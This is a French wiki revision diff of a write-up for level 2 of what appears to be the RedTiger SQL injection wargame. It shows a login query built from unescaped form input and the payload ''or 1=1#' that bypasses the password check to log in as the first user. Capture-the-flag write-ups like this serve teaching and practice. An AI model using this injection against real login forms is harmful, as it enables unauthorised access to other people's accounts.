Outils d'utilisateurs
redtiger_level2
Différences
Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
|
redtiger_level2 [2015/06/21 19:50] Geographer créée |
redtiger_level2 [2017/04/09 15:33] (Version actuelle) |
||
|---|---|---|---|
| Ligne 13: | Ligne 13: | ||
| <code>SELECT * FROM users WHERE username='$_POST["username"]' AND password='$_POST["password"]';</code> | <code>SELECT * FROM users WHERE username='$_POST["username"]' AND password='$_POST["password"]';</code> | ||
| - | Si les entrées utilisateurs ne sont pas protégées nous pouvons forcer les clauses \texttt{WHERE} à TRUE. En effet, en injectant comme nom d'utilisateur et comme mot de passe nous obtenons une requête valide et vraie. | + | Si les entrées utilisateurs ne sont pas protégées nous pouvons forcer les clauses WHERE à TRUE. En effet, en injectant comme nom d'utilisateur et comme mot de passe nous obtenons une requête valide et vraie. |
| <code> | <code> | ||
| - | SELECT * FROM users WHERE username=''or 1=1#' | + | SELECT * FROM users WHERE username=''or 1=1#' AND password=''or 1=1#'; |
| </code> | </code> | ||
| Nous obtenons un accès sur le compte du premier utilisateur de la base données. | Nous obtenons un accès sur le compte du premier utilisateur de la base données. | ||
redtiger_level2.1434909029.txt.gz · Dernière modification: 2017/04/09 15:33 (modification externe)
Outils de la Page
Sauf mention contraire, le contenu de ce wiki est placé sous la licence suivante : CC Attribution-Share Alike 3.0 Unported
